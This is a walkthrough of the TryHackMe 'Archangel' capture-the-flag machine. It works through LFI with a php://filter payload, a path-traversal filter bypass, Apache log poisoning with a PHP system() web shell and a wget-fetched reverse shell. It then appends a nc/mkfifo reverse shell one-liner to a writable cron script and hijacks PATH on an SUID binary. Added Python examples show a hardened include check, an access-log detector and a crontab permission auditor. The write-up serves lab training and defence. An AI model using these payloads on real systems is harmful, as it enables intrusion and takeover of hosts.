Room link :: https://tryhackme.com/room/archangel
Overview
Easy rated boot2root machine at TryHackMe, created by Archangel. This easy machine uses virtual domain name hosting. Once the correct domain has been found, you need to exploit the PHP include() function to get LFI and then a reverse shell. After getting the reverse shell, you need to exploit a cron job to gain privileges as the user. To gain root privileges you need to exploit the PATH variable.
Enumeration
Carry out basic nmap scan with the following command
$ nmap -A <machine-IP>
We can see that two ports are open on the machine. 22 and 80 which are standard SSH and HTTP ports.
Let’s take a look at the webpage. At the top of the website you can find a domain name, mafialive.thm. Let’s add this domain to our /etc/hosts file, pointing to the IP of the machine.
Visit the webpage with host name. We will get our first flag on the home page.
Further analysing the website we find robots.txt, which lists paths such as admin pages or assets that web crawlers are asked not to index. Visiting robots.txt we find a PHP file, test.php.
Accessing test.php provides the following content.
After clicking the button on the webpage, we find that it redirects to mrrobot.php in the directory /var/www/html/development_testing.
This URL hints at a possible Local File Inclusion vulnerability. After trying to access sensitive files such as /etc/passwd and access.log by passing their paths to the view parameter, we find that a PHP filter in the script stops us from reading them. The actual contents of a file can still be viewed by having PHP base64-encode them, using the built-in php://filter stream wrapper with the convert.base64-encode filter. Using the payload below we can read the contents of test.php in base64.
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
We get the base64-encoded PHP file. We need to decode it; we can either use an online decoder or decode it with the following command in the terminal.
$ echo "encoded-string" | base64 -d
This gives us the content of test.php and also the second flag.
Checking the PHP file, we find that the code checks two conditions.
Condition 1
if(!containsStr($_GET['view'], '../..'))
Condition 1 restricts path traversal.
Condition 2
if(!containsStr($_GET['view'], '/var/www/html/development_testing'))
Condition 2 states that anything we do is restricted to a single location, i.e. /var/www/html/development_testing.
We can bypass the path traversal protection by using “.././../” instead of “../../” to travel back directories. Reading the access.log file in /var/log/apache2/ shows that the User-Agent is being logged. So we can get an RCE using log poisoning attack.
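To see why the two substring checks fail and what a normalising check would do instead, here is an added Python example (not code from the room or from this write-up) that models both conditions from test.php beside a hardened variant; containsStr is modelled with Python's in operator, and the three inputs are constructed from the paths used in this write-up.

```python
import posixpath

# Include root named in test.php's second condition.
BASE_DIR = "/var/www/html/development_testing"


def vulnerable_check(view: str) -> bool:
    """The two substring conditions from test.php (containsStr modelled
    with Python's `in`). True means the include would be allowed."""
    if "../.." in view:              # condition 1: naive traversal filter
        return False
    if BASE_DIR not in view:         # condition 2: must mention the base dir
        return False
    return True


def hardened_check(view: str) -> bool:
    """Added hardened variant: reject stream wrappers, normalise the path,
    and only then require it to lie under BASE_DIR."""
    if "://" in view:                # php://, data://, expect:// ...
        return False
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, view))
    return resolved == BASE_DIR or resolved.startswith(BASE_DIR + "/")


# Constructed inputs: the legitimate include, the ".././.." log path and
# the php://filter payload from this write-up.
LEGIT = BASE_DIR + "/mrrobot.php"
TRAVERSAL = BASE_DIR + "/.././.././../log/apache2/access.log"
FILTER = "php://filter/convert.base64-encode/resource=" + BASE_DIR + "/test.php"

if __name__ == "__main__":
    for name, view in [("legit", LEGIT), ("traversal", TRAVERSAL), ("filter", FILTER)]:
        print(f"{name:10} vulnerable={vulnerable_check(view)} hardened={hardened_check(view)}")
```

The traversal path normalises to /var/log/apache2/access.log, which is why a check on the resolved path catches it while a check on the raw string does not.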
Now let’s try to access the log file,
view=/var/www/html/development_testing/.././.././../log/apache2/access.log
We are able to access access.log file, now it’s time to exploit the server using log poisoning attack to gain shell.
Let’s pass a malicious php code snippet in the User-Agent header.
<?php system($_GET['cmd']); ?>
Use Burp Suite to intercept the request and put the malicious PHP snippet in the User-Agent value.
Now we can pass Linux commands through the access.log file; let’s verify using the command below
view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id
We can see that our malicious code is working.
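As the defender's counterpart to this section, here is an added Python example (not from the write-up) that scans Apache combined-format access log lines for the three signals seen above: PHP tags in the User-Agent, a php:// stream wrapper in the view parameter, and a view path that normalises outside the allowed directory. The log lines are constructed for the example and mirror the requests in this write-up.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

BASE_DIR = "/var/www/html/development_testing"

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line: str) -> list[str]:
    """Return the detection labels that apply to one access log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    hits = []
    if "<?php" in m["ua"] or "<?=" in m["ua"]:
        hits.append("php-in-user-agent")         # log poisoning attempt
    query = parse_qs(urlsplit(m["url"]).query)
    for view in query.get("view", []):
        if "://" in view:
            hits.append("stream-wrapper")        # php://filter and friends
        resolved = posixpath.normpath(posixpath.join(BASE_DIR, view))
        if resolved != BASE_DIR and not resolved.startswith(BASE_DIR + "/"):
            hits.append("include-outside-base")  # traversal survived the filter
    if "cmd" in query:
        hits.append("cmd-parameter")             # poisoned log being executed
    return hits


def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """(line number, labels) for every line that triggers at least one label."""
    out = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            out.append((n, hits))
    return out


# Constructed sample log (not real traffic) mirroring the write-up's requests.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2021:10:00:05 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2021:10:00:09 +0000] "GET / HTTP/1.1" 200 1200 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.0.0.5 - - [01/Jan/2021:10:00:12 +0000] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
])
```

Running scan(SAMPLE_LOG) flags lines 2, 3 and 4 and leaves the legitimate mrrobot.php request alone.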
Gaining Foothold
Now let’s upload our PHP reverse shell using Burp Suite. The reverse shell can be found here: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Change the IP and PORT where it says //CHANGE THIS, then start a Python web server with $ python3 -m http.server 8000
Upload the shell to the target machine using wget through Burp Suite, using
view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget http://<local-machine-ip>:8000/shell.php
Now let’s start our netcat listener on our local machine on the port specified in the shell.
$ nc -nvlp 1337
Trigger the shell by visiting mafialive.thm/shell.php
Upgrade to a stable shell using the following commands
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
Once we are inside the machine we can find user.txt in the /home/archangel directory.
Post Exploitation Enumeration
Manually enumerating and checking sudo permissions, SUID binaries and cron jobs, we find an interesting scheduled task which runs every minute as user archangel.
$ cat /etc/crontab
Checking file permissions using
$ ls -la
We can read and write the file, and it contains a simple bash command echoing “hello world” into /opt/backupfiles/helloworld.txt.
Let’s append a one-liner reverse shell to helloworld.sh using the following command.
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local-machine-ip> 4444 >/tmp/f" >> helloworld.sh
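From the defender's side, the weakness here is a script executed by cron as archangel but writable by a lower-privileged account. The added Python example below (not from the write-up) parses /etc/crontab-style lines and reports scripts that someone other than root or the job's owner could modify; the crontab text and the script files are constructed in a temporary directory to mirror the room.

```python
import os
import stat
import tempfile
from pathlib import Path

def parse_system_crontab(text: str) -> list[tuple[str, str]]:
    """Return (user, script) pairs from /etc/crontab-style lines; skips comments and VAR=value."""
    jobs = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue
        if fields[0].startswith("@"):          # @reboot, @hourly, ...
            user, cmd = fields[1], fields[2:]
        else:                                  # five time fields, then user
            user, cmd = fields[5], fields[6:]
        if cmd and cmd[0].startswith("/"):     # only absolute-path commands
            jobs.append((user, cmd[0]))
    return jobs

def weak_permissions(path: str) -> list[str]:
    """Reasons the script could be changed by someone other than its owner (empty = fine)."""
    if not os.path.exists(path):
        return ["missing"]                     # anyone who can write the dir could create it
    mode = os.stat(path).st_mode
    reasons = []
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if mode & stat.S_IWGRP:
        reasons.append("group-writable")
    return reasons

def audit_crontab(text: str) -> list[tuple[str, str, list[str]]]:
    """(user, script, reasons) for every cron job whose script has weak permissions."""
    return [(u, p, weak_permissions(p)) for u, p in parse_system_crontab(text)
            if weak_permissions(p)]

def build_fixture() -> str:
    """Constructed crontab: helloworld.sh mode 777 (as in the room), safe.sh mode 755, gone.sh absent."""
    d = tempfile.mkdtemp()
    for name, mode in (("helloworld.sh", 0o777), ("safe.sh", 0o755)):
        p = os.path.join(d, name)
        Path(p).write_text("#!/bin/bash\necho hello world > /opt/backupfiles/helloworld.txt\n")
        os.chmod(p, mode)
    return ("PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
            f"* * * * * archangel {d}/helloworld.sh\n"
            f"*/5 * * * * root {d}/safe.sh\n"
            f"@reboot root {d}/gone.sh\n")
```

On a real host, run audit_crontab(open("/etc/crontab").read()) and treat any job whose script is group- or world-writable as the same finding this write-up exploits.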
Privilege Escalation
Start the netcat listener on your local machine and wait for few minutes.
Again upgrade your shell to a stable one with following commands.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
There is the flag we already got, and also a folder named secret in the home directory. Changing directory to secret gives us the flag for user2.
There is also a binary called backup which has the SUID bit set. Let’s start a web server on the remote machine and download this binary to our local machine with wget, using the commands,
starting webserver
$ python3 -m http.server 8001
downloading binary using wget
$ wget http://<remote-machine-ip>:8001/backup
Analysing the binary in Ghidra, we get the following in the main function.
The binary executes a cp command to copy files from one directory to another, and it runs as root. This means that if we can replace the system cp binary with our own, we can have root access.
Let’s create our own binary named cp and point $PATH to our directory.
$ echo "/bin/bash" >> cp
$ chmod +x cp
Set the PATH variable using
$ export PATH=$PWD:$PATH
And now execute backup.
$ ./backup
And we are root now. Find the root flag in the /root directory.
$ cd /root
$ cat root.txt
Thank You!!
If you have any suggestions, let me know in the comments and follow me on my socials.